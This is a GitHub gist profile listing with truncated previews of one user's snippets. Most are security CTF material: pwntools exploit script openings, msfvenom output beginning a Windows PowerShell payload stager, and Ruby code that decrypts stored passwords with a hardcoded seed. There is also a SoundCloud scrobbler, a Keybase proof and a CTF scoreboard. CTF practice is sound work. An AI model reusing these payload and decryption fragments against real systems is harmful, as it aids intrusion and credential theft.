Skip to content

Instantly share code, notes, and snippets.

View dwendt's full-sized avatar
⁉️
hello

Ditmar Wendt dwendt

⁉️
hello
View GitHub Profile
@dwendt
dwendt / bank_rwctf_2019.py
Created September 16, 2019 22:06
bank.py rwctf 2019
from pwn import *
import IPython
import sha
import sys
import itertools
import string
from base64 import b64encode
from base64 import b64decode
from schnorr import *
@dwendt
dwendt / soundcloud-scrobbler.js
Last active June 9, 2019 19:28
A fix for the soundcloud -> lastfm greasemonkey scrobbler. Updated to take advantage of soundcloud's pageless navigation.
// ==UserScript==
// @name SoundCloud Last.fm Scrobbler
// @namespace http://userscripts.org/users/266001
// @description SoundCloud Last.fm Scrobbler is a JS/Greasemonkey-based Last.fm scrobbler for SoundCloud with support for loving tracks. Based on Bandcamp Last.fm Scrobbler 0.9.4 GGS-0.9.3.
// @require http://userscripts-mirror.org/scripts/source/85398.user.js
// @include http://soundcloud.com/*
// @include https://soundcloud.com/*
// @version 0.1.6 GGS-0.9.5-Dv6
// @license FreeBSD License (see source code). Portions dual-licensed under the MIT (Expat) License and GPLv2.
// @grant GM_log
@dwendt
dwendt / www.py
Last active May 14, 2018 06:08
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode = fd.read()
#fd.close()
def p32(v):
return struct.pack(">i",v)
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
[DllImport("kernel32.dll")]
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from seed.properties
SEED = 'EB3452127614E25A'
def decrypt(cpass)
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn (https://keybase.io/dwn) on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

@dwendt
dwendt / thing2.exe.rb
Created June 10, 2015 07:54
thing2.exe - legitbs defcon quals 2015 - 4pt pwnable
#!/usr/bin/env ruby
require 'socket'
#require 'hexdump'
$dbg = false
$sock = TCPSocket.new("localhost", 4141)
def recv_until(str)
data = ""
while tmp = $sock.recv(1024) and not tmp.empty?
@dwendt
dwendt / gist:c25895fde82730b8f17f
Created March 25, 2016 15:00
SunCTF scores that CTFTime won't accept
{
"standings": [
{
"id": 393,
"pos": 1,
"score": 1905,
"team": "eipiplus1equals0"
},
{
"id": 135,
@dwendt
dwendt / gist:ccf548cf646f1bce3d11
Created July 20, 2015 23:37
prolog soln for sdhit